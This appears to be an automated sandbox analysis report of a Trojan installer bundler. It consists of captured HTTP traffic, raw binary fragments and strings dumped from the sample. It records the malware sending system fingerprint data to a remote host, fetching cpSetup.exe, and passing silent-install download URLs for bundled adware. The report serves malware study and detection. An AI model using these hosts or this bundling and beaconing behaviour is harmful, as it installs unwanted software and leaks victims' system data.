Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Thu, 12 May 2016 21:58:16 GMT

Connection: close

Content-Length: 428584

...no)9.VB.!.A0....z6.Y...4..S.W..Q2....d.P.f.<.......2.....#.....4..).wHh./P.<\4_..../C.?..P.....D..o....}..VO............%.#X..=q..N.c..N.}...pI..H.y.hz!v.R..g..D..V.q.~..Evq.......k..Y....v.....*]......q..t........<D12=..<.C5..Li].5.=I....oj..)..M&..........G..d.....b...Y39....!P..?..V..WP.NNG...'..vD...gi....k........1.`.L.[...eQ.g."."".......w.....E9..$..F.Di.....C...Nj.&..U..n......u# ..y...~..rLX....#.FKg..N..|.... 8.vKs...3....-.C..DYW.1G.}bdOV...T..R%....MzO....`....!?...._E.Z.^7..!...(.Q'z'..1.`..%.....f...49..|.IB4..K.Vz...Gs.Cd.]....Wm3!..i.K......\.....}).......,.:.5Wt....I...^4.....O..E"...A.#.|fp.^.(}....|0....0.!k.E...E.o..L.Y..9....'h4....6...p0....S....{.w{.K..v..8Z....L......'R....P.'.1.&..e.sY^.d..^F>(3...BXG..U...)s{..H...<A..~........0c.2..L.gd...h.....a....8)'..........d....[.......].....]....z..C.D...?.z^..$..$..z.5..<.. .Yq.~/..g...o..*.5'&....f....,c...k..... ....wA....L.k.......:...HK$]..9....*"..$,.}...An....-........&.....O@...q(...}.".Ds9s..2.....D..d#...y...o....-..K..~n.oW%..}C.\4.'tH.@!....k.....>....B;3y.v..e},w6.......G.n......t...j^.90..6......H>Q..@..S.DD.%.o.(.zz.V..../r.a..Q....!5P 8..'...I .I...%.*..AB...#Q.QPH....JP.E.q]$..4.08...4..XN...s..U...C.........'.....b'....:H....K..&.-A&.{......B..L..P..R./.3p...........'.5..UU.F........=.Mv...98...S):...|7... jG.j.c.{o...&.A.....W..4.]......q!m..tw..rx../..1..6).D.2#c..zN.!....q..cz./......f;....]...........k....q.....[.(<..<.a .<H..s...UHx!B./.$..A..hM.|..I...$....E@..z.3..>._...o.e...U.

<<< skipped >>>

GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: capital.go2cloud.org

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 302 Found

Cache-Control: no-cache, no-store, must-revalidate

Content-Type: text/html; charset=iso-8859-1

Date: Thu, 12 May 2016 21:58:37 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Location: hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1

P3P: CP="NOI CUR OUR NOR INT"

Pragma: no-cache

Server: nginx/1.7.9

Set-Cookie: enc_aff_session_4=ENC02024-102524c8b7d471e3251121f5c3cd0e-1006-4-0-0-0-0-UA-0-3131-313435-343338353236-30-30-30-194.242.96.218-20160512175837-_-1D1F4F24103E253220292314513A1B00655F6F0B4F131541634A1F5117051454457459536E2E2C1807; expires=Sat, 11 Jun 2016 21:58:37 GMT; path=/;

Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Sun, 07 Apr 2019 08:38:37 GMT; path=/;

tracking_id: 102524c8b7d471e3251121f5c3cd0e

X-Robots-Tag: noindex, nofollow

Content-Length: 445

Connection: Close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here</a>.</p>.</body></html>...

<<< skipped >>>

POST /index.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.secularistsarakolet.site

Content-Length: 430

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=C8318CA6891F5119A9FD96EC19E98D71&Sysid1=C8318CA6891F5119A9FD96EC19E98D71&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=Setup__2140_il65.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=Setup__2140_il65&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFA3AA==&netfs=3&ts=1463090333&ver=1.1.5.26

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 12 May 2016 21:58:46 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive

1b79....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>DownloadManagerModern</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.downloadcrest.com/V35/amipb.js"></script>. <script type="text/javascript">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3RoZX

<<< skipped >>>

POST /finalize.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.secularistsarakolet.site

Content-Length: 334

Connection: Keep-Alive

Cache-Control: no-cache

_hdn=0&_ver=1.1.5.26&_p=1&_s=20&_cc=UA&_cid=2140&_psb=0&_cnt=8090dd4d0f36f257c0d595bbfe802c92&_instid=l65&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_DownloadManagerModern=0&r_NationZoom=1&r_JinshanDuba=3&r_SputnikSearch=2&r_YesSearches=1&DownloadManagerModern=3&NationZoom=1&JinshanDuba=1&SputnikSearch=1&YesSearches=4

HTTP/1.1 200 OK

Content-Type: text/xml

Date: Thu, 12 May 2016 21:58:48 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 4590

Connection: keep-alive

....<Array><page><f>1</f><fb>9</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps>DownloadManagerModern</comps><short_name>DownloadManagerModern</short_name><must_show>0</must_show><bdy>CjxkaXYgaWQ9ImFtaV9kX21hbmFnZXJfYm9keSI Cgk8ZGl2IGlkPSJhbWlfbGVmdF9pbWFnZSI CQoJCTxpbWcgaWQ9ImFtaV9pbWFnZXVybCIgc3JjPSJodHRwOi8vcGUtc2l4aS5jb20vaW1nL2ljb25faW5zdGFsbGVyLnBuZyIgLz4KCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5rcyI CQoJCQk8YSBocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9wcml2YWN5Lmh0bWwgIiB0YXJnZXQ9Il9ibGFuayIgc3R5bGU9ImNvbG9yOiB3aGl0ZSI UHJpdmFjeSBQb2xpY3k8L2E PGJyIC8 CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL2luZGV4Lmh0bWwiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5IZWxwPC9hPjxiciAvPgoJCQk8YSBocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9jb250YWN0LXVzLmh0bWwiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5Db250YWN0IHVzPC9hPgoJCTwvZGl2PgoJPC9kaXY Cgk8ZGl2IGlkPSJhbWlfYm9keV90ZXh0Ij4KCQk8ZGl2IGlkPSJhbWlfZGVjX2RpdiI CgkJCTxzcGFuIGlkPSJhbWlfZGVjX3RpdGxlIj5TZXR1cCA8Yj5pbnN0YWxsZXI8L2I PC9zcGFuPgkJCgkJCTxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlRvIGNvbnRpbnVlIGluc3RhbGxpbmcgeW91ciBhcHBsaWNhdGlvbiwgY2xpY2sgb24gdGhlIE5leHQgYnV0dG9uLjwvc3Bhbj4KCQk8L2Rpdj4KCQkJCQoJCTxkaXYgaWQ9ImRfYW1pX0Rvd25sb2FkTWFuYWdlck1vZGVybiIgc3R5bGU9ImhlaWdodDogMTMwcHgiPiAKCQk8YnIgLz4KCQkJPGRpdiBkYXRhLWFkanVzdC1oZWlnaHQ9IjAiIGlkPSJtaWRkbGUiIHN0eWxlPSJ3aWR0aDogMTAwJTsgcGFkZGluZzogMHB4OyBoZWlnaHQ6IDExMHB4OyBtYXJnaW4tdG9wOiA

<<< skipped >>>

GET /Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.secularistsarakolet.site

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/png

Date: Thu, 12 May 2016 21:58:48 GMT

ETag: "24c41-7262-5328b8d5eeccc"

Last-Modified: Wed, 11 May 2016 06:57:17 GMT

Server: Apache/2.2.15 (Red Hat)

Content-Length: 29282

Connection: keep-alive

.PNG........IHDR.......s.....`..1....pHYs...............9.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00 ">. <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/". xmlns:dc="hXXp://purl.org/dc/elements/1.1/". xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/". xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2014 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2016-03-16T16:09:11 02:00</xmp:CreateDate>. <xmp:ModifyDate>2016-03-16T16:23:05 02:00</xmp:ModifyDate>. <xmp:MetadataDate>2016-03-16T16:23:05 02:00</xmp:MetadataDate>. <dc:format>image/png</dc:format>. <photoshop:ColorMode>3</photoshop:ColorMode>. <xmpMM:InstanceID>xmp.iid:36122a74-ac0f-5d40-8bf0-cb214281bd07</xmpMM:InstanceID>. <xmpMM:DocumentID>adobe:docid:photoshop:1f386400-eb82-11e5-9c68-b3c1a0aff854</xmpMM:DocumentID>. <xmpMM:OriginalDocumentID>xmp.did:ff769801-1319-ee4c

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2881

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:54 GMT

Content-Disposition: attachment; filename="cancel1.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "d9f00c86bfa3e08e905128b131229fac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 23503

X-Cache: Hit from cloudfront

Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: GwTgHFdoISZkzBjhmS03rIHfHoS0eB17BdfxNcYAUGhPfPV-QSjtRg==

GIF89ae......@.H*.-<.AC.K=.F>.H'. ;.B,./=.E)./)..@.I=.D=.D?.GC.M>.DC.IC.K'.,@.H>.F:.A*./D.LC.M?.HB.L=.G;.A9.@:.C .-;.CuuuB.K(.)>.G)..<.C). @.I>.E...>.G,. ). &. <.E*.&%.*6.C-.3-.33.7).1&.)www(.-*. .../.54.?-.4=.B...!.().0...-.7...G.I..9-.35.7?.F'.0A.O-..,.5<.B>.J ..D.I5.:..5=.GE.K/.0-.-/.2?.=,.7*. ;.B/.4 .'C.I..79.B&.2 .,<.>".*-.0?.C-.-8.>-.&'.12.4:.AC.B1.7-.4..$'. 3.8Q.\<.A<.G4.9 .05.<C.F6.;;.I@.I".%;.B>.Q*.-0.5&.<9.?'.-#.) .6:.A ./..31.57.>4.96.>0.76.<&.)2.78.?-.2-.3ppp..................................................................................................................................................................................................................................................................................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:5653313B52CD11E48302D8AFAF09E831" xmpMM:DocumentID="xmp.did:5653313C52CD11E48302D8AFAF09E831"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5653313952CD11E48302D8AFAF

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1293

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:55 GMT

Content-Disposition: attachment; filename="decline.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "137a96f0655570ffdf65ae14dad52404"

Accept-Ranges: bytes

Server: AmazonS3

Age: 33966

X-Cache: Hit from cloudfront

Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: KuEvsOr3zBFpfWbfx-6VzBKR_uzo9NBxRIjFUr0s1IAudC0z46Sm4Q==

GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................!.....t.,....e........ns.............n..mB.............FBm.s.C.............AB.DE.............DDI.GGF.............G.I.........(.....HJ.LML..........%....8...z.J.\..a.%N.5qB......8...F......H..F...$)..e.&P.A.I....37>......Ax..JT.N%D..\....)..H.J..U...H..u...[.... ..&/H.{!%.V.m...X0...)Se.......W.P!D.J.... ^.a@..T..(.........B.E....4.<Z4..-2..r....7L.....m*W.Y..........Nc...<.x..a.....Do..........;........{......_.>.. ..3(p....W._9p........{.........z... {[.....Vh...F0@..vX..Y.....D.E..v.!. f.".%j...#bh#._....[....@.)..@.1..[.....L2YD...I..C.X...H@..M2.D.`.....|...h....^.0@.pv.D..`...S.........o....z....7......9.!b.!...Vji. .... ....`<A'..f...T....=......:....0A.[$0@.>......{....a...&.....8@........a...&`...6.l.bP0....;n._. B...@.....l...a.......d......,....k......!h4....G....Wl.j..g....w.q.g.2..$.l..(....,....0..s.4..r......<....6.-t.?.m4.l.<G.o....PG-..TWM..M[...P....X...$d.m..g..@ .;....

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2157

Connection: keep-alive

Date: Sat, 12 Dec 2015 03:13:59 GMT

Content-Disposition: attachment; filename="next.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"

Accept-Ranges: bytes

Server: AmazonS3

Age: 21980

X-Cache: Hit from cloudfront

Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: _pf7A1s5gUmMDTPqgxT_w007CC28IttnXMmir4pleetmsCZdbVeFng==

GIF89ae............pppC.K@.H>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.C<.D@.I>.F@.I?.H>.GC.MB.LB.K@.IE.OK.RT.\..$..# .%!..)&..%. ".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B8.><.B<.C;.B;.@7.=@.H>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~............................................$.('. %.)4.9).,).-*.. .-). .. .-*.--.10.41.5/.22.44.86.:C.HG.IH.L_.b.............................................'.(*.*(.)-../.0-.->.>C.E........................,. .&..................uuu...!.......,....e..........'......*\.........'.....f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL........2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<.....G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h......>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....<........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."....7.Xc...|.K(#(..................nD.D ....8.(aK>.............

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2157

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:57 GMT

Content-Disposition: attachment; filename="finish.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"

Accept-Ranges: bytes

Server: AmazonS3

Age: 21979

X-Cache: Hit from cloudfront

Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: DAYyOWr_G-eK7FsfLGsyvCBPLTI84olBSQY9JY4CB0kMa7bSXwlBUg==

GIF89ae............pppC.K@.H>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.C<.D@.I>.F@.I?.H>.GC.MB.LB.K@.IE.OK.RT.\..$..# .%!..)&..%. ".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B8.><.B<.C;.B;.@7.=@.H>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~............................................$.('. %.)4.9).,).-*.. .-). .. .-*.--.10.41.5/.22.44.86.:C.HG.IH.L_.b.............................................'.(*.*(.)-../.0-.->.>C.E........................,. .&..................uuu...!.......,....e..........'......*\.........'.....f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL........2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<.....G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h......>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....<........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."....7.Xc...|.K(#(..................nD.D ....8.(aK>.............

<<< skipped >>>

GET /?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0

Host: get.wenter3.space

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 350208

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Content-Transfer-Encoding: Binary

Content-disposition: attachment; filename="cpSetup.exe"

Date: Thu, 12 May 2016 21:58:13 GMT

X-Cache: Miss from cloudfront

Via: 1.1 b4ee4db849dcb5fce83f0bc3d6a9d57f.cloudfront.net (CloudFront)

X-Amz-Cf-Id: xeMckmYpslwK8ecETGD0QgaHiG7WYlLxCn0xbPK12tbiuJInRXcPeQ==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........g..}4..}4..}4...4..}449.4..}4...4..}4...49.}4\X.4..}4..|4..}449.4..}4...4..}4...4..}449.4..}4Rich..}4........................PE..L....D3W.............................l............@..................................X....@.................................X...P....0...Q.......................5...........................W.......W..@............................................text............................... ..`.rdata..............................@..@.data...hS..........................@....tls......... ......................@....rsrc....Q...0...R..................@..@.reloc...5.......6..."..............@..B.........................................................................................................................................................................................................................................................................................;E.....E........ E.....E.........I.....E.......h..C...Q..Y.....h..C...Q..Y.....h..C...Q..Y.......D.....E.........D.....E........{I.....E.........D.....E.........D.....E........KI.....E........{D.....E........kD.....E.........I.....E.........I.....E.........H.....E.........H.....E........ .E...u......$.E.XRD.h..C.. .E...P.........E.$.E...............U..............D.3...$....h..C..kP......(.E..........@...u...$Pj.....C..,.E.....$....3.....E...E...H....]........0.E...u.....0.E.................8.E...u.....8.E

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1764:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|/":

"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\NSISdl.dll

E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp

E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\NSISdl.dll

.reloc

WS2_32.dll

NSISdl.dll

invalid URL

Host: %s

GET %s HTTP/1.0

User-Agent: NSISDL/1.2 (Mozilla)

http=

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Unable to open %s

%skB (%d%%) of %skB at %u.ukB/s

(%u hours remaining)

(%u minutes remaining)

(%u seconds remaining)

Downloading %s

.vN {

({,{

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\cpSetup.exe

Setup__2140_il65.exe

SETUP_~1.EXE

.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ii_start.txt

ersion=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

up__2140_il65.exe

ps.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

c:\%original file name%.exe

%original file name%.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp

hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

hXXp://pe-ma3i.info/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7

Nullsoft Install System v2.46

Setup__2140_il65.exe_1408:

.text

`.rdata

@.data

.rsrc

@.reloc

FTPQ

j.Yf;

_tcPVj@
